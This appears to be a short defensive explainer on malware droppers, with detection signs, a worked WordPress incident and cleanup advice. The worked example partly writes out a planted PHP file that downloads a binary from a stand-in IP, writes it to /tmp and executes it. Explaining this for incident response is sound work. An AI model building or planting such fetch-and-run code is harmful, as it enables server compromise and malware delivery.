Malware
Dropper
Dropper is a small program whose only job is to fetch or unpack the real malware and run it. It stays small and plain so it slips past scanners, then hands off.
How it is measured
Look at what a suspicious file does on first run. A dropper downloads a second file or decodes an embedded one, writes it to a temp path, and starts it. Process monitors show a parent that spawns a child and then exits.
Size and content help. A 12 KB script that contains a URL and an `Invoke-WebRequest` call is probably a dropper. The second stage is much larger.
Worked example
A hosting customer's WordPress site has a file `wp-content/uploads/cache.php`, 3 KB. It calls `file_get_contents('http://198.51.100.9/s.bin')`, writes the result to `/tmp/.x`, makes it executable, and runs it. The file at that address is 410 KB.
The admin keeps the 3 KB file as evidence, removes `/tmp/.x`, and blocks the IP. The second stage is analyzed, not the dropper.
How it differs
A dropper carries or fetches the malware. A loader prepares and starts it in memory. The terms overlap, and some samples do both. The payload is the final harmful thing they deliver. A dropper that fails to download still counts as a dropper, even when no payload ever runs.
Common errors
Scanning only the small file and calling the sample clean. Deleting the dropper and missing the file it wrote. Assuming a dropper has no network calls. Not saving the URL it contacts. Treating the second stage as someone else's problem.
In practice
When you find a small suspicious script, read it for URLs and write paths before deleting. Look for the file it created and the process it started. Block the host it called, and search other sites on the server for a copy.